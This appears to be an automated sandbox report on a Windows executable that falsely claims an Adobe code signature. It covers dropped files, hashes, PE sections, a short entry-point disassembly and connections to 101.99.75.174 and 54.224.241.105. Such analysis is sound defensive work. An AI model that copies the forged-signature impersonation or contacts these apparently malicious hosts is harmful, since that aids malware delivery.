                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                            Category:dropped
                                                            Size (bytes):386528
                                                            Entropy (8bit):7.9736851559892425
                                                            Encrypted:false
                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                            Malicious:false
                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:PDF document, version 1.7, 1 pages
                                                            Category:dropped
                                                            Size (bytes):126079
                                                            Entropy (8bit):7.943849374898452
                                                            Encrypted:false
                                                            SSDEEP:3072:491AUlpumVlx1KDctCivx/JII6GE2XAYX:7wFVlxtvxXE2XL
                                                            MD5:883B3959460633ADD1FDDEB2B3060765
                                                            SHA1:A70C7DEB8F428678A43156C08267568984D0B712
                                                            SHA-256:82C26B4F1DE6AC3DB8689BDF21D64B63837DF027F37EA6878F799B5CB4D65596
                                                            SHA-512:EFCC6208349802B6EC36DF856718AD91C63A6D13FDBA712635D84A880269C0357B009D8A710B2CFECEB77AE07B46DC9BC84F4053F4E45C56FE4778A5A464E7BF
                                                            Malicious:false
                                                            Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 1083./Filter /FlateDecode./Type /XObject./Width 851./BitsPerComponent 8./Length 125221.>>.stream.x...e.$..q\.{..................].w..n..Cp. y...../gU...cHf_.f..]ud.-.SU.S.%I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I..*~....=.$I.$I.....W_..CH.$I.$I~.......!$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I2@|..}...{.{...[n....r.SO=....kp.-I.$I.?/....?.O?....|....{pO:I.$I.dHd...Z..b.5..K~...=.$I.$I.!..g.q.:..J..f.].7.x..tP.NN.$I.$.`!..Xc....n6h.h...o..F.)._.$I.$.`$..4.L...O.7hx...9...2._.$I.$.`...z....G........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6220
                                                            Entropy (8bit):3.7365847207756384
                                                            Encrypted:false
                                                            SSDEEP:96:gOoCCg74fukvhkvCCtFObtWoHCObtWjHD:ho6726FObiObu
                                                            MD5:0A772CDE11D4A0BEFF134DC5827AFF94
                                                            SHA1:9FD4EF0BCDA8F2FBBF0A8DA069AEB8E4C4DBFA1D
                                                            SHA-256:AC7D6915851E03C143E9753194B44CE999637809707120E99E03553F1805CC8E
                                                            SHA-512:828D7ABAA5C768BFE0640FFAEFAE3ECC44880ED84825FD900A3547C351C4A901022BCE917DE158BB87F3AA4B016D20F06B233B7A44AA39C221F447B41844C44B
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ....N.5q....[...G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....2..G...G..G......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.v...........................c..A.p.p.D.a.t.a...B.V.1......Y.v..Roaming.@......EW)N.Y.v..........................V...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.v..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.v..........................2.{.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.v....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.v....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.v................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6220
                                                            Entropy (8bit):3.7365847207756384
                                                            Encrypted:false
                                                            SSDEEP:96:gOoCCg74fukvhkvCCtFObtWoHCObtWjHD:ho6726FObiObu
                                                            MD5:0A772CDE11D4A0BEFF134DC5827AFF94
                                                            SHA1:9FD4EF0BCDA8F2FBBF0A8DA069AEB8E4C4DBFA1D
                                                            SHA-256:AC7D6915851E03C143E9753194B44CE999637809707120E99E03553F1805CC8E
                                                            SHA-512:828D7ABAA5C768BFE0640FFAEFAE3ECC44880ED84825FD900A3547C351C4A901022BCE917DE158BB87F3AA4B016D20F06B233B7A44AA39C221F447B41844C44B
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ....N.5q....[...G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....2..G...G..G......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.v...........................c..A.p.p.D.a.t.a...B.V.1......Y.v..Roaming.@......EW)N.Y.v..........................V...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.v..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.v..........................2.{.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.v....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.v....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.v................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.306461250274409
                                                            Encrypted:false
                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                            Malicious:false
                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.748470243900274
                                                            TrID:
                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                            • DOS Executable Generic (2002/1) 12.50%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                            File name:lg1wwLsmCX.exe
                                                            File size:64'456 bytes
                                                            MD5:1ceb5d0cb063290c1f66fccfed96a220
                                                            SHA1:09b735e87dd4ef4917d2e1bcd969408c3ac099fd
                                                            SHA256:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
                                                            SHA512:4e17a9d98c1ea9db1f330d7475bed55a0c662ce5e546145eb8c1973fdf702571179a51ba39aa2c983f8ce42aa6edb1a72f1a20e9f7de78950f94076edc9527d0
                                                            SSDEEP:1536:sOzhJIRg5Xji0araoUBeV9aE4f2bmKF60N+92+na7RGJfx:sAICkZQ+gT4+aVG
                                                            TLSH:BD53F1B987441CE0C52E9B7421DA467E59B5B25672C1831372BFA4208FE8743BBBF780
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...eD............/...........................@..............................................G@......t...............J.....
                                                            Icon Hash:bdb5bd98b3f39807
                                                            Entrypoint:0x4011c0
                                                            Entrypoint Section:T10B924G
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                            DLL Characteristics:NO_SEH
                                                            Time Stamp:0x1F8A4465 [Wed Oct 8 11:32:53 1986 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f41f41af65e0c95c3d701cfd7af8b14a
                                                            Signature Valid:false
                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                            Subject Chain
                                                            • CN=Adobe Inc., OU=Acrobat 11, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                            Version:3
                                                            Thumbprint MD5:DE33CDD57B201C17BA1D948F9027EA38
                                                            Thumbprint SHA-1:8E5C0EF19E4319A5161B04C5179899335768CCC0
                                                            Thumbprint SHA-256:66048B4FFA7CEC38A851BD978E87BC469612964C9319C94005AC0FA060A6CE65
                                                            Serial:0E6E32FCB0E03A0C0B2BC04B56F2038B
                                                            Instruction
                                                            push ebp
                                                            dec eax
                                                            mov ebp, esp
                                                            dec eax
                                                            sub esp, 00000050h
                                                            mov eax, 00000000h
                                                            mov dword ptr [ebp-20h], eax
                                                            mov edx, 00030000h
                                                            mov ecx, 00010000h
                                                            call 00007F08B9061743h
                                                            mov ecx, 00000001h
                                                            call 00007F08B9061741h
                                                            dec eax
                                                            lea eax, dword ptr [ebp-20h]
                                                            dec eax
                                                            mov dword ptr [esp+20h], eax
                                                            mov eax, 00000000h
                                                            dec ecx
                                                            mov ecx, eax
                                                            dec eax
                                                            lea eax, dword ptr [ebp-18h]
                                                            dec ecx
                                                            mov eax, eax
                                                            dec eax
                                                            lea edx, dword ptr [ebp-10h]
                                                            dec eax
                                                            lea ecx, dword ptr [ebp-04h]
                                                            call 00007F08B9061724h
                                                            dec eax
                                                            mov eax, dword ptr [ebp-18h]
                                                            dec ecx
                                                            mov eax, eax
                                                            dec eax
                                                            mov edx, dword ptr [ebp-10h]
                                                            mov ecx, dword ptr [ebp-04h]
                                                            call 00007F08B90614A1h
                                                            mov dword ptr [ebp-1Ch], eax
                                                            mov ecx, dword ptr [ebp-1Ch]
                                                            call 00007F08B906170Eh
                                                            leave
                                                            ret
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx], al
                                                            add al, 02h
                                                            add eax, 50010304h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FD6h]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FFEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FFEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FFEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            adc byte ptr [ebp+71h], bh
                                                            mov byte ptr [ecx], al
                                                            pushad
                                                            and dh, byte ptr [edi+00h]
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x21e00x3cG8MCUXOZ
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xc094SRW4MTG9
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x30000x18Z2TXZQUP
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xd2000x29c8SRW4MTG9
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x221c0x50G8MCUXOZ
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            T10B924G0x10000x2e90x400e60db9a21caf1bda7fd66724d6240776False0.392578125data3.828984910677204IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            G8MCUXOZ0x20000x3600x4009ba3852e83d41097503573521acac7b9False0.333984375data4.143245199340312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            Z2TXZQUP0x30000x180x200842ad4dd96cd5979a8d9cfca400a4eb1False0.0546875data0.2272518948570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            SRW4MTG90x40000xc0940xc2004d22c53c08a4da3f9079e168b3ca93ceFalse0.9779719716494846data7.871980812241951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x40b80xbfc5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9867598231927158
                                                            RT_GROUP_ICON0x100800x14data1.1
                                                            DLLImport
                                                            msvcrt.dllmemset, _controlfp, __set_app_type, __getmainargs, exit
                                                            kernel32.dllCreateProcessA, WaitForSingleObject, CloseHandle
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 6, 2024 15:53:00.633753061 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:00.633795977 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:00.634047031 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:00.647792101 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:00.647813082 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.057342052 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.057425976 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.061132908 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.061144114 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.061561108 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.100188017 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.143337965 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.604001999 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.604036093 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.604039907 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.604141951 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.604165077 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.657387972 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.690201998 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.690216064 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.690242052 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.690294981 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.690332890 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.812171936 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.812189102 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.812266111 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.812294006 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.838423967 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.838474035 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.838505030 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.838515043 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.838541985 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.855806112 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.855885983 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.855906963 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.888819933 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.888835907 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.888900995 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.888923883 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.938636065 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.984513998 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.984554052 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.984572887 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:02.984597921 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:02.984632015 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.004287004 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.004297972 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.004333973 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.004359007 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.004406929 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.021553993 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.021562099 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.021641970 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.031825066 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.031836033 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.031894922 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.046988010 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.046997070 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.047056913 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.047075033 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.059432983 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.059478998 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.059528112 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.059528112 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.059540987 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.068571091 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.068610907 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.068643093 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.068653107 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.068685055 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.077713966 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.077780962 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.077795982 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.110018015 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.110124111 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.110138893 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.157385111 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.203720093 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.203733921 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.203762054 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.203804016 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.203840971 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.213692904 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.213701963 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.213728905 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.213754892 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.213785887 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.213794947 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.213810921 CET44349709101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:03.213876963 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:03.236361027 CET49709443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:13.482881069 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:13.482906103 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:13.483125925 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:13.483344078 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:13.483355999 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.907342911 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.907812119 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:14.907830000 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.908934116 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.908993959 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:14.909003019 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.909040928 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:14.910340071 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:14.910408020 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.911037922 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:14.911055088 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:14.975581884 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:15.357577085 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:15.357683897 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:15.358385086 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:15.359283924 CET49748443192.168.2.1054.224.241.105
                                                            Dec 6, 2024 15:53:15.359302998 CET4434974854.224.241.105192.168.2.10
                                                            Dec 6, 2024 15:53:37.253015041 CET49806443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:37.253046036 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:37.253166914 CET49806443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:37.261131048 CET49806443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:37.261142015 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:38.845205069 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:38.845325947 CET49806443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:38.849477053 CET49806443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:38.849498034 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:38.849791050 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:38.856580973 CET49806443192.168.2.10101.99.75.174
                                                            Dec 6, 2024 15:53:38.903331995 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:39.388607025 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:39.388689995 CET44349806101.99.75.174192.168.2.10
                                                            Dec 6, 2024 15:53:39.388736963 CET49806443192.168.2.10101.99.75.174
